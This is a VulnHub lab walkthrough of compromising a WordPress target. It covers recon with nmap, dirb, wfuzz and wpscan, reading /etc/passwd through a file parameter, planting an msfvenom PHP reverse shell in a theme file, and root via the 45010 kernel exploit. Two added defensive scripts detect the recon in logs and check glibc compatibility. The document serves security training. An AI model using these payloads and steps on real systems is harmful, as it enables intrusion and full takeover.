[Hands-on Penetration Testing] VulnHub target 1: a first pass through the penetration-testing workflow (detailed steps)
Contents
- 1. Host discovery: identify the target
- 2. Port discovery: look for an entry point
- 3. Web penetration
- dirb web directory scan
- fuzz to find the correct URL parameter
- WordPress exploitation
- Obtaining the WordPress username
- 4. File upload, reverse connection
- 5. Privilege escalation with msf
- **Fixing the gcc compilation version problem:**
Target VM address
Objective: master the basic penetration-testing workflow and the tools involved
Tool knowledge points covered:
- dirb: scanning web paths
- fuzz: finding the correct URL parameter name
- msf: searching for and exploiting vulnerabilities
- WordPress file upload vulnerability and reverse shell
Known information:
The target runs in a VMware virtual machine in NAT mode, on the 192.168.31.0/24 network
Attacking host: Kali Linux
Goal:
- Get into the system and obtain the target's flag
1. Host discovery: identify the target
Using nmap (the command line works just as well) the host IP is found to be 192.168.31.100. In a real engagement the scan will certainly turn up several hosts, and several kinds of reconnaissance information need to be collected separately
2. Port discovery: look for an entry point
# scan all ports
nmap -p 1-65535 -T4 -A -v 192.168.31.100
3. Web penetration
Based on the services found by the scan, continue with the web service, which is the easiest to break into
Approaches when facing a web application:
- directory scanning
- fuzzing request parameters
- trying sensitive files such as robots.txt
- brute-forcing usernames and passwords
- reading the page source (looking for usable information)
In information security, fuzzing is a common black-box testing technique and also one method of information gathering. Fuzzing tests the robustness and security of a system by feeding it large amounts of random data. A fuzz test usually involves building a program that generates large volumes of random data and sending that data to the target system or application in order to uncover potential vulnerabilities or errors.
In information gathering, fuzzing is typically used to probe network services or applications for vulnerabilities and weaknesses. Sending many kinds of random data to the target server can reveal potential flaws and security problems such as buffer overflows, denial of service and SQL injection. Fuzzing can find weaknesses that routine security testing misses, because it exercises how the system responds to, and handles, malformed data.
In short, fuzzing is a very useful information-gathering technique that helps security professionals discover potential security problems and vulnerabilities. Note, however, that fuzzing can crash or destabilise the target system, so it must be carried out with care and within the relevant ethical and legal rules.
dirb web directory scan
└─# dirb http://192.168.31.100/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Jul 1 00:37:21 2023
URL_BASE: http://192.168.31.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.31.100/ ----
+ http://192.168.31.100/dev (CODE:200|SIZE:131)
+ http://192.168.31.100/index.php (CODE:200|SIZE:136)
==> DIRECTORY: http://192.168.31.100/javascript/
+ http://192.168.31.100/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.31.100/wordpress/
---- Entering directory: http://192.168.31.100/javascript/ ----
==> DIRECTORY: http://192.168.31.100/javascript/jquery/
---- Entering directory: http://192.168.31.100/wordpress/ ----
+ http://192.168.31.100/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-includes/
+ http://192.168.31.100/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.31.100/javascript/jquery/ ----
+ http://192.168.31.100/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/ ----
+ http://192.168.31.100/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/css/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/images/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/includes/
+ http://192.168.31.100/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/js/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/maint/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/network/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-admin/user/
---- Entering directory: http://192.168.31.100/wordpress/wp-content/ ----
+ http://192.168.31.100/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/plugins/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/themes/
==> DIRECTORY: http://192.168.31.100/wordpress/wp-content/uploads/
---- Entering directory: http://192.168.31.100/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/network/ ----
+ http://192.168.31.100/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-admin/user/ ----
+ http://192.168.31.100/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://192.168.31.100/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/plugins/ ----
+ http://192.168.31.100/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/themes/ ----
+ http://192.168.31.100/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.31.100/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Jul 1 00:38:39 2023
DOWNLOADED: 46120 - FOUND: 15
The web content scan shows that this target serves WordPress. Visiting the discovered URL paths yields a few useful ones:
- http://192.168.31.100/dev (CODE:200|SIZE:131)
- ==> DIRECTORY: http://192.168.31.100/wordpress/
A hint is given: use a fuzz tool to find the correct parameter name, then pass location.txt as the parameter value to continue to the next step
fuzz to find the correct URL parameter
Uses of fuzzing:
- finding URL parameters
- SQL injection
- password brute-forcing
- WAF bypass
# Request the site with a parameter wordlist and collect statistics for each response (status code, line count, word count, character count); the response that differs from all the others reveals the correct parameter
# first pass: collect the response statistics
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.31.100/index.php?FUZZ
# second pass: filter out the common result; --hw 12 hides responses with 12 words, the word count every miss returned in the first pass
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.31.100/index.php?FUZZ
The correct parameter is file; follow the hint and request it
With the parameter name in hand, it has to be given a value in the URL to pull system information. Since file means a file, the first thing that comes to mind is the system account file /etc/passwd, so request it as the parameter value.
The hint yields the keyword "follow_the_ippsec". What is this keyword related to? The services known so far are SSH and HTTP, and the web site runs the WordPress CMS. A penetration test wants a username and password, so look at WordPress to see whether account information can be obtained
WordPress exploitation
Obtaining the WordPress username
**Method one:** username from experience
A freshly installed WordPress automatically publishes a post that shows the author's username, so the WordPress login username is victor
Trying this account with the keyword as the password, the login succeeds:
Next, look for a vulnerability in WordPress that gives access to the system
Method two: fingerprinting tools to get the WordPress users
Fingerprinting tools for WordPress:
- wpscan
- cmseek
Installing cmseek:
apt-get update
apt-get install -y cmseek
Enumerating WordPress users with wpscan also returns the user victor
# full output of the WordPress user enumeration
# wpscan --url http://192.168.31.100/wordpress -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://192.168.31.100/wordpress/ [192.168.31.100]
[+] Started: Sat Jul 1 01:32:10 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.31.100/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.31.100/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.31.100/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.31.100/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.31.100/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
| - http://192.168.31.100/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
[+] WordPress theme in use: twentynineteen
| Location: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/
| Last Updated: 2023-03-29T00:00:00.000Z
| Readme: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
| Style Name: Twenty Nineteen
| Style URI: https://wordpress.org/themes/twentynineteen/
| Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.4 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <====================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Jul 1 01:32:12 2023
[+] Requests Done: 69
[+] Cached Requests: 6
[+] Data Sent: 16.91 KB
[+] Data Received: 20.512 MB
[+] Memory used: 168.305 MB
[+] Elapsed time: 00:00:02
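From the defender's side, the dirb directory scan, the wfuzz parameter sweep and wpscan's author-ID brute forcing shown above each leave a recognisable trace in the web server's access log. The detector below is an added example, not part of the original walkthrough; it runs over constructed Apache combined-format lines modelled on those tool runs, and the thresholds are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')

# Thresholds are assumptions for this example, not values from the walkthrough.
PARAM_NAMES_PER_PATH = 20   # distinct query-parameter names on one path -> parameter fuzzing
AUTHOR_IDS = 5              # distinct ?author= values -> WordPress user enumeration
NOT_FOUND_RATIO = 0.7       # share of 404s over at least MIN_REQUESTS requests -> directory brute force
MIN_REQUESTS = 30

def detect(lines):
    """Return (client_ip, finding, detail) tuples for the recon patterns used in this walkthrough."""
    per_ip = defaultdict(lambda: {"n": 0, "404": 0, "params": defaultdict(set), "authors": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                          # not a combined-format line; skip it
        st = per_ip[m["ip"]]
        st["n"] += 1
        st["404"] += m["status"] == "404"
        url = urlsplit(m["url"])
        for key, value in parse_qsl(url.query, keep_blank_values=True):  # keeps wfuzz-style "?name"
            st["params"][url.path].add(key)
            if key == "author":
                st["authors"].add(value)
    findings = []
    for ip, st in per_ip.items():
        for path, names in st["params"].items():
            if len(names) >= PARAM_NAMES_PER_PATH:
                findings.append((ip, "parameter-name fuzzing", f"{path}: {len(names)} distinct names"))
        if len(st["authors"]) >= AUTHOR_IDS:
            findings.append((ip, "author-id enumeration", f"{len(st['authors'])} author ids"))
        if st["n"] >= MIN_REQUESTS and st["404"] / st["n"] >= NOT_FOUND_RATIO:
            findings.append((ip, "directory brute force", f"{st['404']}/{st['n']} responses were 404"))
    return findings

# Constructed sample lines modelled on the tool runs above (not captured from the target).
WORDS = "file id page q s search action cat type lang name user dir path view p debug test mode tab".split()
SAMPLE = (
    [f'192.168.31.101 - - [01/Jul/2023:00:41:00 +0800] "GET /index.php?{w} HTTP/1.1" 200 136' for w in WORDS]
    + [f'192.168.31.101 - - [01/Jul/2023:01:32:10 +0800] "GET /wordpress/?author={i} HTTP/1.1" 301 0' for i in range(1, 11)]
    + [f'192.168.31.103 - - [01/Jul/2023:00:37:30 +0800] "GET /dir{i}/ HTTP/1.1" 404 279' for i in range(40)]
    + ['10.0.0.5 - - [01/Jul/2023:09:00:00 +0800] "GET /wordpress/?p=1 HTTP/1.1" 200 5120']
)

if __name__ == "__main__":
    print(*detect(SAMPLE), sep="\n")
```

In production the same function would be fed the live access log; the `?author=N` pattern is exactly the probe wpscan's "Author Id Brute Forcing" finding relies on, so it is worth alerting on even at low volumes.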
4. File upload, reverse connection
After logging in, how does the WordPress penetration begin?
- file upload vulnerability
Generate the reverse-connection script:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.31.101 lport=6666 -o shell.php
In WordPress, use the theme editor to edit the current theme, find an editable PHP file (secret.php in the screenshot) and paste in the reverse-connection PHP generated above
On Kali Linux, start a handler listening on port 6666 with msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.31.101
lhost => 192.168.31.101
msf6 exploit(multi/handler) > set lport 6666
lport => 6666
msf6 exploit(multi/handler) > exploit
When http://192.168.31.100/wordpress/wp-content/themes/twentynineteen/secret.php is visited (this is how theme files are reached over the web; just remember the path, it follows the standard WordPress directory layout), the handler receives the session
At this point a limited set of commands can be run on the target; sysinfo shows the system is Ubuntu 16.04.2
5. Privilege escalation with msf
Next comes privilege escalation, so that more commands can be run
Approach:
The following shows how to search the exploit database from msf for an operating-system vulnerability and exploit it to gain privileges
Run in msfconsole:
searchsploit 16.04 Ubuntu
The kernel version points to a usable exploit; compile the exploit program:
/usr/share/exploitdb/exploits/linux/local/45010.c
upload it to an executable location on the target, /tmp, and run it to escalate privileges
Compile the privilege-escalation program on Kali Linux
cp /usr/share/exploitdb/exploits/linux/local/45010.c /root
cd /root
gcc 45010.c -o 45010 # because of the gcc version, the binary fails on the target; see the fix below
Run in msfconsole:
- upload the file
- run the 45010 program from a shell
Error when running it: ./45010: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./45010)
Fixing the gcc compilation version problem:
Check the target's glibc version through the reverse shell:
ldd --version
On Kali Linux:
apt-get install -y autoconf
git clone https://github.com/NixOS/patchelf.git
cd patchelf
./bootstrap.sh
./configure
make
make check
sudo make install
PatchELF is a simple utility for modifying existing ELF executables and libraries. Specifically, it can:
Change the dynamic loader ("ELF interpreter") of an executable:
$ patchelf --set-interpreter /lib/my-ld-linux.so.2 my-program
Change the RPATH of executables and libraries:
$ patchelf --set-rpath /opt/my-libs/lib:/other-libs my-program
Shrink the RPATH of executables and libraries:
$ patchelf --shrink-rpath my-program
Use the glibc-all-in-one repository to download a glibc build environment matching the target's version, then compile against it:
gcc -Wl,-rpath='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64',-dynamic-linker='/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-linux-x86-64.so.2' -s 45010.c -o 45010V2
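The `GLIBC_2.34' not found` failure above can be predicted before anything is uploaded, by comparing the GLIBC symbol versions a binary imports with the glibc that `ldd --version` reports on the target. The checker below is an added example, not from the original post; it parses `objdump -T` output (a constructed excerpt is embedded) and takes the target's glibc version as an argument, 2.23 for this Ubuntu 16.04 target as the glibc-all-in-one path above shows.

```python
import re
import subprocess
import sys

# Version tag objdump -T prints next to each versioned dynamic symbol, e.g. "GLIBC_2.34".
GLIBC_TAG = re.compile(r'\bGLIBC_(\d+(?:\.\d+)*)\b')


def version_key(text):
    """'2.2.5' -> (2, 2, 5) so that versions compare numerically, not as strings."""
    return tuple(int(p) for p in text.split('.'))


def check_compat(objdump_output, target_glibc):
    """Return (ok, newest_required, offending_symbols) for a binary against a target glibc.

    target_glibc is the version printed by `ldd --version` on the target, e.g. '2.23'.
    The dynamic loader accepts the binary only if every GLIBC_* tag it imports
    is <= the target's glibc version."""
    target = version_key(target_glibc)
    offending, newest = [], None
    for line in objdump_output.splitlines():
        m = GLIBC_TAG.search(line)
        if not m or '*UND*' not in line:      # only undefined (imported) symbols matter
            continue
        ver = version_key(m.group(1))
        newest = ver if newest is None or ver > newest else newest
        if ver > target:
            offending.append(line.split()[-1])  # symbol name is the last column
    newest_text = '.'.join(map(str, newest)) if newest else None
    return (not offending, newest_text, offending)


# Constructed objdump -T excerpt for a binary linked on a glibc 2.34+ host (not from the page).
SAMPLE_OBJDUMP = """\
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) puts
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34)  __libc_start_main
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) setuid
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) system
"""

if __name__ == "__main__":
    # Usage: python3 glibc_check.py ./some-binary 2.23
    out = subprocess.run(["objdump", "-T", sys.argv[1]], capture_output=True, text=True, check=True).stdout
    ok, newest, bad = check_compat(out, sys.argv[2])
    print("OK" if ok else f"needs GLIBC_{newest}; symbols too new for the target: {', '.join(bad)}")
```

Any binary built on a glibc 2.34 or newer host imports `__libc_start_main@GLIBC_2.34`, which is why even a trivial program compiled on current Kali fails on Ubuntu 16.04 and why the `-Wl,-rpath,-dynamic-linker` build above is needed.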
Re-upload and run
The gcc-related error is gone, so one problem is solved, but now a program execution permission problem appears: one problem nested inside another, what a mess!
Switching to Kali Linux 2021-02-08, however, privilege escalation succeeded. This confirms something: a newer Kali Linux brings newer tools but is not always compatible with old exploit scripts, so keeping an older Kali Linux around is necessary.
Privilege escalation result
In the screenshot the target's IP has become 192.168.31.102 because DHCP reassigned it; this does not affect anything
Target machines usually place the flag in root's home directory, so with the escalated root account the flag can be read. Target done!!!